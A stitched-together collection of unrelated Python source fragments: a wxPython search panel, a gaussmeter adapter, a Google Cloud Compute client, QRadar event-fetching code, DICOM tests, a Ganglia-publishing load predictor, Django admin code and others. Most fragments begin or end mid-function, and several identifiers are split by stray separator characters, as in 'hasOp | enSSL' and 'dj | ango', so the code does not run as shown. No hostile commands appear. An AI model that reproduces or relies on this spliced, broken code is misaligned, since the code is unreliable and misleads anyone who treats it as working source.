self._mainSizer.Add(self._searchText, 0, wx.ALL |
wx.EXPAND | wx.ALIGN_CENTER_VERTICAL, border=2)
self._mainSizer.Add(self._nextSearchBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
self._mainSizer.Add(self._prevSearchBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
self._mainSizer.Add(self._closeBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=1)
self._mainSizer.Add(self._resultLabel, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=2)
# Элементы интерфейса для замены
self._mainSizer.Add(self._replaceLabel, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=2)
self._mainSizer.Add(self._replaceText, 0, wx.ALL |
wx.EXPAND | wx.ALIGN_CENTER_VERTICAL, border=2)
self._mainSizer.Add(self._replaceBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
self._mainSizer.Add(self._replaceAllBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
# self._mainSizer.AddStretchSpacer()
# self._mainSizer.AddStretchSpacer()
self.SetSizer(self._mainSizer)
self.Layout()
def __onNextSearch(self, event):
if self._controller is not None:
self._controller.nextSearch()
def __onPrevSearch(self, event):
if self._controller is not None:
self._controller.prevSearch()
def __onReplace(self, event):
if self._controller is not None:
self._controller.replace()
def __onReplaceAll(self, event):
if self._controller is not None:
self._controller.replaceAll()
def __onSearchTextChange(self, event):
if self._controller is not None:
self._controller.enterSearchPhrase()
def __onKeyPressed(self, event):
key = event.GetKeyCode()
if key == wx.WXK_ESCAPE:
self.Close()
event.Skip()
def __onEnterPress(self, event):
if self._controller is None:
return
if self._replaceText.IsShown():
self._controller.replace()
else:
self._controller.nextSearch()
def __onCloseClick(self, event):
self.Close()
|
"""
Contains methods for working with the Lakeshore 475 Gaussmeter
"""
from quantities import Quantity
from typing import Optional
from instruments.lakeshore import Lakeshore475 as _Lakeshore475
from time import sleep
class Lakeshore475(object):
"""
Adapter layer for IK's Lakeshore 475 implementation
"""
_port = '/dev/ttyUSB0'
_address = 12
_managed_instance = None
_constructor = _Lakeshore475
@property
def port_name(self) -> str:
"""
:return: The port to which this magnetometer will be attached
"""
return self._port
@port_name.setter
def port_name(self, new_port_name: str) -> None:
"""
:param new_port_name: The new port
:return:
"""
self._port = new_port_name
@property
def address(self) -> int:
"""
:return: The address
"""
return self._address
@address.setter
def address(self, new_address: int) -> None:
"""
:param new_address: The desired address
:return:
"""
self._address = new_address
@property
def _magnetometer(self) -> Optional[_Lakeshore475]:
"""
:return: The instance of the magnetometer that this adapter manages, or
None if there is no instance.
.. note::
The 1 second delay is required for the gaussmeter to reset
itself and accept commands
"""
if self._managed_instance is None:
self._managed_instance = self._constructor.open_gpibusb(
port=self.port_name, gpib_address=self.address)
| sleep(1)
return self._managed_instance
@property
def field(self) -> Quantity:
"""
:return: The measured magnetic field from the Gaussmeter
"""
try:
return self._magnetometer.field
except ValueError:
return -100000.0 * self._magnetometer.field_units # type:
# Qua | ntity |
../../../../../../../share/py | shared/orca/scripts/apps/packagemanager/script | _settings.py |
quota_project_id,
client_info=client_info,
always_use_jwt_access=True,
)
def delete_unary(
self,
request: Union[compute.DeleteTargetTcpProxyRequest, dict] = None,
*,
project: str = None,
target_tcp_proxy: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.Operation:
r"""Deletes the specified TargetTcpProxy resource.
Args:
request (Union[google.cloud.compute_v1.types.DeleteTargetTcpProxyRequest, dict]):
The request object. A request message for
TargetTcpProxies.Delete. See the method description for
details.
project (str):
Project ID for this request.
This corresponds to the ``project`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
target_tcp_proxy (str):
Name of the TargetTcpProxy resource
to delete.
This corresponds to the ``target_tcp_proxy`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.compute_v1.types.Operation:
Represents an Operation resource. Google Compute Engine
has three Operation resources: | \*
[Global](/compute/docs/reference/rest/v1/globalOperations)
\*
[Regional](/compute/docs/reference/rest/v1/regionOperations)
\*
[Zonal](/compute/docs/reference/rest/v1/zoneOperations)
You can use an operation resource to manage asynchronous
API requests. For more information, read Handling API
responses. Operations can be global, re | gional or zonal.
- For global operations, use the globalOperations
resource. - For regional operations, use the
regionOperations resource. - For zonal operations, use
the zonalOperations resource. For more information, read
Global, Regional, and Zonal Resources.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project, target_tcp_proxy])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a compute.DeleteTargetTcpProxyRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, compute.DeleteTargetTcpProxyRequest):
request = compute.DeleteTargetTcpProxyRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project is not None:
request.project = project
if target_tcp_proxy is not None:
request.target_tcp_proxy = target_tcp_proxy
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete]
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def get(
self,
request: Union[compute.GetTargetTcpProxyRequest, dict] = None,
*,
project: str = None,
target_tcp_proxy: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.TargetTcpProxy:
r"""Returns the specified TargetTcpProxy resource. Gets a
list of available target TCP proxies by making a list()
request.
Args:
request (Union[google.cloud.compute_v1.types.GetTargetTcpProxyRequest, dict]):
The request object. A request message for
TargetTcpProxies.Get. See the method description for
details.
project (str):
Project ID for this request.
This corresponds to the ``project`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
target_tcp_proxy (str):
Name of the TargetTcpProxy resource
to return.
This corresponds to the ``target_tcp_proxy`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.compute_v1.types.TargetTcpProxy:
Represents a Target TCP Proxy
resource. A target TCP proxy is a
component of a TCP Proxy load balancer.
Global forwarding rules reference target
TCP proxy, and the target proxy then
references an external backend service.
For more information, read TCP Proxy
Load Balancing overview.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project, target_tcp_proxy])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a compute.GetTargetTcpProxyRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, compute.GetTargetTcpProxyRequest):
request = compute.GetTargetTcpProxyRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project is not None:
request.project = project
if target_tcp_proxy is not None:
request.target_tcp_proxy = target_tcp_proxy
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get]
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def insert_unary(
self,
request: Union[compute.InsertTargetTcpProxyRequest, dict] = None,
*,
project: str = None,
target_tcp_proxy_resource: compute.TargetTcpProxy = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.Operation:
r"""Creates a Target |
ng to get events for offense ID: {offense_id}, '
f'offense_start_time: {offense_start_time}, '
f'additional_where: {additional_where}, '
f'events_limit: {events_limit}.')
num_of_failures = 0
while num_of_failures <= max_retries:
try:
print_debug_msg(f'Creating search for offense ID: {offense_id}, '
f'query_expression: {query_expression}.')
ret_value = client.search_create(query_expression=query_expression)
print_debug_msg(f'Created search for offense ID: {offense_id}, '
f'offense_start_time: {offense_start_time}, '
f'additional_where: {additional_where}, '
f'events_limit: {events_limit}, '
f'ret_value: {ret_value}.')
return ret_value
except Exception:
print_debug_msg(f'Failed to create search for offense ID: {offense_id}. '
f'Retry number {num_of_failures}/{max_retries}.')
print_debug_msg(traceback.format_exc())
num_of_failures += 1
if num_of_failures == max_retries:
print_debug_msg(f'Max retries for creating search for offense: {offense_id}. Returning empty.')
break
time.sleep(FAILURE_SLEEP)
print_debug_msg(f'Returning empty events for offense ID: {offense_id}.')
return None
def poll_offense_events_with_retry(client: Client, search_id: str, offense_id: int,
max_retries: int = EVENTS_FAILURE_LIMIT) -> Tuple[List[Dict], str]:
"""
Polls QRadar service for search ID given until status returned is within '{'CANCELED', 'ERROR', 'COMPLETED'}'.
Afterwards, performs a call to retrieve the events returned by the search.
Has retry mechanism, because QRadar service tends to return random errors when
it is loaded.
Therefore, 'max_retries' retries will be made, to try avoid such cases as much as possible.
Args:
client (Client): Client to perform the API calls.
search_id (str): ID of the search to poll for its status.
offense_id (int): ID of the offense to enrich with events returned by search. Used for logging purposes here.
max_retries (int): Number of retries.
Returns:
(List[Dict], str): List of events returned by query. Returns empty list if number of retries exceeded limit,
A failure message in case an error occured.
"""
num_of_failures = 0
start_time = time.time()
failure_message = ''
while num_of_failures <= max_retries:
try:
print_debug_msg(f"Getting search status for {search_id}")
search_status_response = client.search_status_get(search_id)
print_debug_msg(f"Got search status for {search_id}")
query_status = search_status_response.get('status')
# failures are relevant only when consecutive
num_of_failures = 0
print_debug_msg(f'Search query_status: {query_status}')
# Possible values for query_status: {'CANCELED', 'ERROR', 'COMPLETED'}
# Don't try to get events if CANCELLED or ERROR
if query_status in {'CANCELED', 'ERROR'}:
if failure_message == '':
failure_message = f'query_status is {query_status}'
return [], failure_message
elif query_status == 'COMPLETED':
print_debug_msg(f'Getting events for offense {offense_id}')
search_results_response = client.search_results_get(search_id)
print_debug_msg(f'Http response: {search_results_response.get("http | _response", "Not specified - ok")}')
events = search_results_response.get('events', [])
sanitized_events = sanitize_outputs(events)
print_debug_msg(f'Fetched {len(sanitized_events)} events for offense {offense_id}.')
return sanitized_events, failure_message
elapsed = time.time() - start_time
if elapsed >= FETCH_SLEEP: # print status debug every | fetch sleep (or after)
print_debug_msg(f'Still fetching offense {offense_id} events, search_id: {search_id}.')
start_time = time.time()
time.sleep(EVENTS_INTERVAL_SECS)
except Exception as e:
print_debug_msg(
f'Error while fetching offense {offense_id} events, search_id: {search_id}. Error details: {str(e)} \n'
f'{traceback.format_exc()}')
num_of_failures += 1
if num_of_failures < max_retries:
time.sleep(FAILURE_SLEEP)
else:
failure_message = f'{repr(e)} \nSee logs for further details.'
print_debug_msg(f'Could not fetch events for offense ID: {offense_id}, returning empty events array.')
return [], failure_message
def enrich_offense_with_events(client: Client, offense: Dict, fetch_mode: str, events_columns: str, events_limit: int,
max_retries: int = MAX_FETCH_EVENT_RETIRES):
"""
Enriches offense given with events.
Has retry mechanism for events returned by query to QRadar. This is needed because events might not be
indexed when performing the search, and QRadar will return less events than expected.
Retry mechanism here meant to avoid such cases as much as possible
Args:
client (Client): Client to perform the API calls.
offense (Dict): Offense to enrich with events.
fetch_mode (str): Which enrichment mode was requested.
Can be 'Fetch With All Events', 'Fetch Correlation Events Only'
events_columns (str): Columns of the events to be extracted from query.
events_limit (int): Maximum number of events to enrich the offense.
max_retries (int): Number of retries.
Returns:
(Dict): Enriched offense with events.
"""
failure_message = ''
events: List[dict] = []
min_events_size = min(offense.get('event_count', 0), events_limit)
# decreasing 1 minute from the start_time to avoid the case where the minute queried of start_time equals end_time.
for i in range(max_retries):
# retry to check if we got all the event (its not an error retry), see docstring
search_response = create_search_with_retry(client, fetch_mode, offense, events_columns,
events_limit)
if not search_response:
continue
offense_id = offense['id']
events, failure_message = poll_offense_events_with_retry(client, search_response['search_id'], offense_id)
print_debug_msg(f"Polled events for offense ID {offense_id}")
if len(events) >= min_events_size:
print_debug_msg(f"Fetched {len(events)}/{min_events_size} for offense ID {offense_id}")
break
print_debug_msg(f'Did not fetch enough events. Expected at least {min_events_size}. Retrying to fetch events '
f'for offense ID: {offense_id}. Retry number {i}/{max_retries}')
if i < max_retries - 1:
time.sleep(SLEEP_FETCH_EVENT_RETIRES)
print_debug_msg(f"Reached max retries for offense {offense.get('id')} with failure message {failure_message}")
if failure_message == '' and len(events) < min_events_size:
failure_message = 'Events were probably not indexed in QRadar at the time of the mirror.'
offense = dict(offense, mirroring_events_message=failure_message)
if events:
offense = dict(offense, events=events)
return offense
def get_incidents_long_running_execution(client: Client, offenses_per_fetch: int, user_query: str, fetch_mode: str,
events_columns: str, events_limit: int, ip_enrich: bool, asset_enrich: bool,
last_highest_id: int, incident_type: Optional[str],
mirror_direction: Optional[str]) -> Tuple[Opt |
import os
from collections import defaultdict
from dataclasses import asdict
from pathlib import Path
from unittest import mock
import numpy as np
import pydicom
import pytest
from panimg.image_builders.dicom import (
_get_headers_by_study,
_validate_dicom_files,
format_error,
image_builder_dicom,
)
from panimg.image_builders.metaio_utils import parse_mh_header
from panimg.panimg import _build_files
from grandchallenge.cases.models import Image
from tests.cases_tests import RESOURCE_PATH
DICOM_DIR = RESOURCE_PATH / "dicom"
def test_get_headers_by_study():
files = [Path(d[0]).joinpath(f) for d in os.walk(DICOM_DIR) for f in d[2]]
studies = _get_headers_by_study(files, defaultdict(list))
assert len(studies) == 1
for key in studies:
assert [str(x["file"]) for x in studies[key]["headers"]] == [
f"{DICOM_DIR}/{x}.dcm" for x in range(1, 77)
]
for root, _, files in os.walk(RESOURCE_PATH):
files = [Path(root).joinpath(f) for f in files]
break
studies = _get_headers_by_study(files, defaultdict(list))
assert len(studies) == 0
def test_validate_dicom_files():
files = [Path(d[0]).joinpath(f) for d in os.walk(DICOM_DIR) for f in d[2]]
studies = _validate_dicom_files(files, defaultdict(list))
assert len(studies) == 1
for study in studies:
headers = study.headers
assert study.n_time == 19
assert study.n_slices == 4
with mock.patch(
"panimg.image_builders.dicom._get_headers_by_study",
return_value={
"foo": {"headers": headers[1:], "file": "bar", "index": 1},
},
):
errors = defaultdict(list)
studies = _validate_dicom_files(files, errors)
assert len(studies) == 0
for header in headers[1:]:
assert errors[header["file"]] == [
format_error("Number of slices per time point differs")
]
def test_image_builder_dicom_4dct(tmpdir):
files = {Path(d[0]).joinpath(f) for d in os.walk(DICOM_DIR) for f in d[2]}
result = _build_files(
builder=image_builder_dicom, files=files, output_directory=tmpdir
)
assert result.consumed_files == {
Path(DICOM_DIR).joinpath(f"{x}.dcm") for x in range(1, 77)
}
assert len(result.new_images) == 1
image = Image(**asdict(result.new_images.pop()))
assert image.shape == [19, 4, 2, 3]
assert len(result.new_image_files) == 1
mha_file_obj = [
x for x in result.new_image_files if x.file.suffix == ".mha"
][0]
headers = parse_mh_header(mha_file_obj.file)
direction = headers["TransformMatrix"].split()
origin = headers["Offset"].split()
spacing = headers["ElementSpacing"].split()
exposures = headers["Exposures"].split()
content_times = headers["ContentTimes"].split()
assert len(exposures) == 19
assert exposures == [str(x) for x in range(100, 2000, 100)]
assert len(content_times) == 19
assert content_times == [str(x) for x in range(214501, 214520)]
dcm_ref = pydicom.dcmread(str(DICOM_DIR / "1.dcm"))
assert np.array_equal(
np.array(list(map(float, direction))).reshape((4, 4)), np.eye(4)
)
assert np.allclose(
list(map(float, spacing))[:2],
list(map(float, list(dcm_ref.PixelSpacing),)),
)
assert np.allclose(
list(map(float, origin)),
list(map(float, dcm_ref.ImagePositionPatient)) + [0.0],
)
@pytest.mark.parametrize(
"folder,element_type",
[
("dicom", "MET_SHORT"),
("dicom_intercept", "MET_FLOAT"),
("dicom_slope", "MET_FLOAT"),
],
)
def test_dicom_rescaling(folder, element_type, tmpdir):
"""
2.dcm in dico | m_intercept and dicom_slope has been modified to add a
small intercept (0.01) or slope (1.001) respectively.
"""
files = [
Path(d[0]).joinpath(f)
for d in os.walk(RESOURCE_PATH / folder)
for f in d[2]
]
result = _build_files(
builder=image_builder_dicom | , files=files, output_directory=tmpdir
)
assert len(result.new_image_files) == 1
mha_file_obj = [
x for x in result.new_image_files if x.file.suffix == ".mha"
][0]
headers = parse_mh_header(mha_file_obj.file)
assert headers["ElementType"] == element_type
def test_dicom_window_level(tmpdir):
files = {
Path(d[0]).joinpath(f)
for d in os.walk(RESOURCE_PATH / "dicom")
for f in d[2]
}
result = _build_files(
builder=image_builder_dicom, files=files, output_directory=tmpdir
)
assert len(result.new_image_files) == 1
mha_file_obj = [
x for x in result.new_image_files if x.file.suffix == ".mha"
][0]
headers = parse_mh_header(mha_file_obj.file)
assert headers["WindowCenter"] == "30"
assert headers["WindowWidth"] == "200"
assert len(result.new_images) == 1
image_obj = result.new_images.pop()
assert image_obj.window_center == 30.0
assert image_obj.window_width == 200.0
|
" measurements available for state " + state)
sliced_data = None
for j in self.memory[state]['arrayMeas']:
#self.my_logger.debug("DOKMEANS self.memory[state]['arrayMeas'][j]: "+ str(j))
# If this measurement belongs in the slice we're insterested in
if j[0] >= from_inlambda and j[0] <= to_inlambda:
#self.my_logger.debug("DOKMEANS adding measurement : "+ str(j))
# add it
if sliced_data == None:
sliced_data = np.array(j, ndmin=2)
else:
sliced_data = np.append(sliced_data, [j], axis=0)
k = 1 # number of clusters
# 1. No known lamdba values close to current lambda measurement
if sliced_data == None:
# Check if there are any known values from +-50% inlambda.
# original_inlambda = float(from_inlambda* (10/9))
# from_inlambda = 0.8 * original_inlambda
# to_inlambda = 1.2 * original_inlambda
# self.my_logger.debug("Changed lambda range to +- 20%: "+ str(from_inlambda) + " - "+ str(to_inlambda))
# for j in self.memory[state]['arrayMeas']:
# #self.my_logger.debug("DOKMEANS self.memory[state]['arrayMeas'][j]: "+ str(j))
# # If this measurement belongs in the slice we're insterested in
# if j[0] >= from_inlambda and j[0] <= to_inlambda:
# # add it
# if sliced_data == None:
# sliced_data = np.array(j, ndmin=2)
# else:
# sliced_data = np.append(sliced_data, [j], axis=0)
# #centroids, label = kmeans2(self.memory[state]['arrayMeas'], k, minit='points') # (obs, k)
# #else:
# if sliced_data == None:
self.log.debug("No known lamdba values close to current lambda measurement. Returning zeros!")
else:
# self.log.debug("DOKMEANS length of sliced_data to be fed to kmeans: " + str(len(sliced_data))
# + " (out of %d total)" % count_state_measurements)
centroids, label = kmeans2(sliced_data, k, minit='points')
pass
# initialize dictionary
num_of_meas = {}
#num_of_meas = {'0': 0, '1': 0, '2': 0, '3': 0, '4': 0}
for j in range(0, k):
num_of_meas[str(j)] = 0
if len(label) > 0:
for i in label:
num_of_meas[str(i)] += 1
max_meas_cluster = max(num_of_meas.iteritems(), key=operator.itemgetter(1))[0]
# self.my_logger.debug("DOKMEANS state: "+ state +" kmeans2 centroids: "+ str(centroids) +" label: "+
# str(num_of_meas) + " cluster with max measurements: "+ str(max_meas_cluster))
ctd['inlambda'] = centroids[int(max_meas_cluster)][0]
ctd['throughput'] = centroids[int(max_meas_cluster)][1]
ctd['latency'] = centroids[int(max_meas_cluster)][2]
ctd['cpu'] = centroids[int(max_meas_cluster)][3]
else:
#self.log.debug("DOKMEANS one of the clusters was empty and so label is None :|. Returning zeros")
ctd['inlambda'] = 0.0
ctd['throughput'] = 0.0
ctd['latency'] = 0.0
ctd['cpu'] = 0.0
#return None
else:
self.log.debug("DOKMEANS self.memory[state]['arrayMeas'] is None :|")
return ctd
def moving_average(self, iterable, n=3):
# moving_average([40, 30, 50, 46, 39, 44]) --> 40.0 42.0 45.0 43.0
# http://en.wikipedia.org/wiki/Moving_average
it = iter(iterable)
d = deque(itertools.islice(it, n - 1))
d.appendleft(0)
s = sum(d)
for elem in it:
s += elem - d.popleft()
d.append(elem)
yield s / float(n)
def predict_load(self):
# Linear Regression gia na doume to slope
stdin, stdout = os.popen2("tail -n 20 " + self.measurementsFile)
stdin.close()
lines = stdout.readlines();
stdout.close()
ten_min_l = [] # store past 10 mins lambda's
ten_min = [] # store past 10 mins ticks
for line in lines:
m = line.split('\t\t') # state, lambda, throughput, latency, | cpu, time tick
ten_min_l.append(float(m[1]))
ten_min.append(float(m[5]))
# run running average on the 10 mins lambda measurements
n = 5
run_avg_gen = self.moving_average(ten_min_l, n)
run_avg = []
for r in run_avg_gen:
run_avg.append(float(r))
ten_min_ra = ten_min[2:18] # np.arange(i-8, i-2, 1)
# linear regression on the running average
#(slope, | intercept, r_value, p_value, stderr) = linregress(ten_min, ten_min_l)
(slope, intercept, r_value, p_value, stderr) = linregress(ten_min_ra, run_avg)
# fit the running average in a polynomial
coeff = np.polyfit(ten_min, ten_min_l, deg=2)
self.log.debug("Slope (a): " + str(slope) + " Intercept(b): " + str(intercept))
self.log.debug("Polynom coefficients: " + str(coeff))
#self.my_logger.debug("next 10 min prediction "+str(float(slope * (p + 10) + intercept + stderr)))
predicted_l = float(slope * (ten_min[19] + 10) + intercept + stderr) # lambda in 10 mins from now
#predicted_l = np.polyval(coeff, (ten_min[9] + 10)) # lambda in 10 mins from now
if slope > 0:
#if predicted_l > allmetrics['inlambda'] :
dif = 6000 + 10 * int(slope)
#dif = 6000 + 0.2 * int(predicted_l - allmetrics['inlambda'])
self.log.debug("Positive slope: " + str(slope) + " dif: " + str(dif)
+ ", the load is increasing. Moving the lambda slice considered 3K up")
else:
dif = -6000 + 10 * int(slope)
#dif = -6000 + 0.2 * int(predicted_l - allmetrics['inlambda'])
self.log.debug("Negative slope " + str(slope) + " dif: " + str(dif)
+ ", the load is decreasing. Moving the lambda slice considered 3K down")
#dif = ((predicted_l - allmetrics['inlambda'])/ allmetrics['inlambda']) * 0.1 * 6000#* allmetrics['inlambda']
#dif = int((predicted_l / allmetrics['inlambda']) * 6000)
return predicted_l
def publish_to_local_ganglia(self, allmetrics):
"""
Publishes monitoring data to local ganglia agent
:param allmetrics:
:return:
"""
self.log.debug( "TAKEDECISION allmetrics: " + str(allmetrics))
#Publish measurements to ganglia
try:
os.system("gmetric -n ycsb_inlambda -v " + str(
allmetrics['inlambda']) + " -d 15 -t float -u 'reqs/sec' -S " + str(
self.monitoring_endpoint) + ":[DEBUG] hostname")
os.system("gmetric -n ycsb_throughput -v " + str(
allmetrics['throughput']) + " -d 15 -t float -u 'reqs/sec' -S " + str(
self.monitoring_endpoint) + ":[DEBUG] hostname")
os.system(
"gmetric -n ycsb_latency -v " + str(allmetrics['latency']) + " -d 15 -t float -u ms -S " + str(
self.monitoring_endpoint) + ":[DEBUG] hostname")
except:
pass
def handle_metrics(self, client_metrics, server_metrics):
# read metrics
allmetrics = {'inlambda': 0, 'throughput': 0, 'latency': 0, 'cpu': 0}
if not self.debug:
## Aggreggation of YCSB client metrics
|
from django.contrib import admin
from django.contrib.flatpages.admin import FlatPageAdmin
from dj | ango.contrib.flatpages.models import FlatPage
from django.db import models
from suit_redactor.widgets import RedactorWidget
class FlatPageCustom(FlatPageAdmin):
formfield_overrides = {
models.TextField: {'widget': RedactorWidget(editor_options={'lang': 'en'})}
}
admin.site.unregist | er(FlatPage)
admin.site.register(FlatPage, FlatPageCustom)
|
#
# Utility functions
#
import sys
from functools import partial
from uuid import UUID
from hashlib import sha1
from os import path, listdir
from zipfile import ZipFile
from subprocess import Popen, TimeoutExpired
import nacl.utils
import nacl.secret
def isValidUUID(uid):
"""
Validate UUID
@param uid: UUID value to be verfied, can be bytes or str
@return: True if UUID valid, else False
"""
try:
# attempt convertion from bytes to str
uid = uid.decode('ascii')
except AttributeError:
# is already bytes object
pass
except UnicodeDecodeError:
# uid contains non-ascii characters, invalid UUID
return False
try:
out = UUID(uid, version=4)
except ValueError:
return False
# check converted value from UUID equals original value. UUID class is not strict on input
return str(out) == uid
def encrypt(safe, *args):
"""
Encrypt all provided data
@param safe: encryption class
@param args: data to be encrypted
@return: encryption output iterable
"""
return (safe.encrypt(a, nacl.utils.random(nacl.secret.SecretBox.NONCE_SIZE)) for a in args)
def sha1sum(filePath, blocksize=1024):
"""
Calculate SHA1 hash of file
@param filePath: Path to hashable file
@param blocksize: Amount of bytes to read into memory before hashing
@return: SHA1 hash value (bytes)
"""
with open(filePath, mode='rb') as f:
out = sha1()
for buf in iter(partial(f.read, blocksize), b''):
out.update(buf)
return bytes(out.hexdigest(), encoding='ascii')
def checkCerts():
"""
Checks to see if required TLS certificates exist in Resources directory. Attempts to generate certificates if not found
@returns: Boolean value based on success
"""
resDir = absolutePath('Resources')
command = None
success = False
# check to see if required certificates exist
if not all(True if path.isfile(path.join(resDir, cert)) else False for cert in ('server.crt', 'server.key.orig')):
############
# Check OS
############
if sys.platform in ('linux', 'darwin'):
# bash script run
command = 'sh {}'.format('create_certs_linux.sh')
elif sys.platform == 'win32':
hasOp | enSSL = False
# check for openssl requirement (downloaded during installer run)
files = sorted((path.isdir(f), f) for f in listdir(resDir) if f.lower().startswith('openssl-'))
# check for expanded directory and executable
for isDir, ofile in files:
if isDir and path.isfile(path.join(resDir, ofile, 'openssl.exe')):
hasOpenSSL = True
| newDir = ofile
break
if not hasOpenSSL and files:
# sorted filename to list newest version first)
for ofile in sorted(f for isDir, f in files if not isDir and path.splitext(f)[1] == '.zip'):
# extract archive
with ZipFile(path.join(resDir, ofile), 'r') as ozip:
newDir = path.join(resDir, path.splitext(ofile)[0])
ozip.extractall(path=newDir)
# verify openssl.exe exists in directory
if path.isfile(path.join(newDir, 'openssl.exe')):
hasOpenSSL = True
break
if hasOpenSSL:
# write openssl directory to config file
with open(path.join(resDir, 'openssl.cfg'), 'w') as config:
config.writelines([newDir])
# windows bat command file
command = r'cmd /c {}'.format('create_certs_windows.bat')
if command:
proc = Popen([command], cwd=resDir, shell=True)
try:
proc.wait(180)
except TimeoutExpired:
proc.kill()
# check command has generated correct files
if all(True if path.isfile(path.join(resDir, cert)) else False for cert in ('server.crt', 'server.key.orig')):
success = True
else:
success = True
return success
def absolutePath(pathname):
"""
Return the absolute path of the given file or directory
@return: absolute path
"""
if getattr(sys, 'frozen', False):
# Frozen application denotes packaged application, modules are moved into a zip
datadir = path.dirname(sys.executable)
else:
# Source based installation, use parent directory of this module's directory
datadir = path.join(path.dirname(__file__), path.pardir)
return path.abspath(path.join(datadir, pathname))
|
# Copyright 2011, Thomas G. Dimiduk
#
# This file is part of GroupEng.
#
# GroupEng is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GroupEng is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with GroupEng. If not, see <http://www.gnu.org/licenses/>.
import re
from .utility import numberize
from .errors import GroupEngFileError
def read_input(infile):
if not hasattr(infile, 'readlines'):
infile = open(infile, 'U')
lines = infile.readlines()
lines = [l.strip() for l in lines if l.strip() != '' and l.strip()[0] != '#']
dek = {}
rules = []
i = 0
while i < len(lines):
line = lines[i]
if re.match('class_?list', line):
dek['classlist'] = split_key(line)[1]
elif re.match('(group_?)?size', line):
dek['group_size'] = split_key(line)[1]
| elif re.match('student_identifier', line) or re.match('[Ii][Dd]', line):
dek['student_identifier'] = split_key(line)[1]
elif re.match('number_of_groups', line):
dek['number_of_groups'] = int(split_key(line)[1])
elif re.match('tries', line):
dek['tries'] = int(split_key(line)[1])
elif line[0] == '-':
line = line[1:]
# read a rule
rule = {}
rule['name'] = split_key(line)[0].lo | wer()
rule['attribute'] = split_key(line)[1]
# read extra arguments
while i+1 < len(lines) and lines[i+1][0] != '-':
i += 1
line = lines[i]
key, val = split_key(line)
val = tuple([v.strip() for v in val.split(',')])
vals = []
for v in val:
vals.append(union_group(v))
if len(vals) == 1:
vals = vals[0]
rule[key] = vals
rules.append(rule)
else:
raise GroupEngFileError(line, i+1, infile.name)
i += 1
dek['rules'] = rules
return dek
def split_key(st):
return [s.strip() for s in st.split(':')]
def union_group(item):
items = [i.strip() for i in item.split('=')]
if items[0][0] == '(':
items[0] = items[0][1:]
if items[-1][-1] == ')':
items[-1] = items[-1][:-1]
items = tuple([numberize(i) for i in items])
if len(items) == 1:
items = items[0]
return items
|
import agents as ag
import envgui as gui
# change this line ONLY to refer to your project
import submissions.Porter.vacuum2 as v2
# ______________________________________________________________________________
# Vacuum environmenty
class Dirt(ag.Thing):
pass
class VacuumEnvironment(ag.XYEnvironment):
"""The environment of [Ex. 2.12]. Agent perceives dirty or clean,
and bump (into obstacle) or not; 2D discrete world of unknown size;
performance measure is 100 for each dirt cleaned, and -1 for
each turn taken."""
def __init__(self, width=4, height=3):
super(VacuumEnvironment, self).__init__(width, height)
self.add_walls()
def thing_classes(self):
return [ag.Wall, Dirt,
# ReflexVacuumAgent, RandomVacuumAgent,
# TableDrivenVacuumAgent, ModelBasedVacuumAgent
]
def percept(self, agent):
"""The percept is a tuple of ('Dirty' or 'Clean', 'Bump' or 'None').
Unlike the TrivialVacuumEnvironment, location is NOT perceived."""
status = ('Dirty' if self.some_things_at(
agent.location, Dirt) else 'Clean')
bump = ('Bump' if agent.bump else'None')
return (bump, status)
def execute_action(self, agent, action):
if action == 'Suck':
dirt_list = self.list_things_at(agent.location, Dirt)
if dirt_list != []:
